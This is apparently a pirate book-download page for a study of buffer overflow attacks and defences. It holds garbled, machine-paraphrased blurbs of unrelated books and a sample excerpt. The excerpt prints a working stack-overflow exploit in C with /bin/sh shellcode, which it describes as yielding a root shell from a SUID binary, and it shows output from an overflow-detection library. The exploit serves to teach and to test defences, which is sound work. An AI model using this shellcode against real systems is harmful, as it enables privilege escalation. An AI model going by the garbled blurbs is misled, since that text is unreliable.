Nonfiction 2

Download A Buffer Overflow Study - Attacks and Defenses by Pierre-Alain, Vincent Glaume PDF

By Pierre-Alain, Vincent Glaume

Show description

Read or Download A Buffer Overflow Study - Attacks and Defenses PDF

Similar nonfiction_2 books

Portable Video, Fifth Edition: ENG & EFP

Transportable Video: ENG and EFP, 5th variation specializes in the ideas and expertise of unmarried digicam digital information accumulating and digital box construction. masking every thing from easy inventive and technical enhancing ideas to budgets and copyright matters, it's obtainable to the house videomaker or beginner and to the pro looking info at the most recent advances in strategy and gear.

A Lighter Footprint: A Practical Guide to Minimising Your Impact on the Planet

‘We needs to search to greatly decrease the heavy tread of our footprint upon the earth; in a different way, our kids and our grandchildren may have little or no desire of having fun with a liveable planet. ’ Angela Crocombe believes that international warming is the most important challenge dealing with humanity this present day, and that every people has a necessary half to play find an answer through lowering our actual impression in the world.

Living Stones Pilgrimage

The Holy Land has continuously had a magnetic charm for Christians. each year, millions tread the crowded streets of Jerusalem, or stroll by means of the quiet waters of Galilee. There are hundreds of thousands of guidebooks deisgned for pilgrims and different viewers. The come across with the stones which Jesus observed and touched has been, for lots of, a strong religious event.

Extra resources for A Buffer Overflow Study - Attacks and Defenses

Sample text

1 LD PRELOAD The first method is based on the LD PRELOAD environment variable, and is used in the script you will find in the exploits directory. /t1 This program tries to use strcpy() to overflow the buffer. If you get a /bin/sh prompt, then the exploit has worked. Press any key to continue... Detected an attempt to write across stack boundary. 0-9/exploits/t1. uid=1000 euid=1000 pid=19982 Call stack: 0x40017504 0x40017624 0x804854c 0x4004065a Overflow caused by strcpy() Killed Of course it implies that it works only when a user sets this environment variable properly.

1 Exploits We intend to see how our system behaves when it faces stack and heap overflows. We use simple exploits to perform these tests. 1 Stack overflow We will use only one exploit to test stack attacks : stack1 is a program belonging to root, with a SUID bit, and provides a root shell. The shellcode is obtained by overflowing a local variable. h> /* Code to execute: */ char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; char large_string[128]; int main(int argc, char *argv[]){ char buffer[96]; /* buffer to overflow */ int i; long *long_ptr = (long *)large_string; for (i = 0; i < 32; i++) *(long_ptr + i) = (int)buffer; for (i = 0; i < (int)strlen(shellcode); i++) large_string[i] = shellcode[i]; strcpy(buffer, large_string); return 0; } 60 How does it work ?

In the second loop, the shellcode is copied into large string. At this stage, large string consists of shellcode + address of buffer. Then the vulnerable function strcpy is called. When the main returns, the instructions in buffer will be executed, because the return address has been previously overwritten, and now contains a pointer to buffer. The SUID bit and the root ownership of the binary are only a way to show how dangerous it may be, we mainly focus on the overflow here. 2 Heap overflow Heap and malloc The first program we will use to test heap overflow exploits (heap1) is based on the same principle as stack1 and provides a shell root too.

Download PDF sample

Rated 4.63 of 5 – based on 9 votes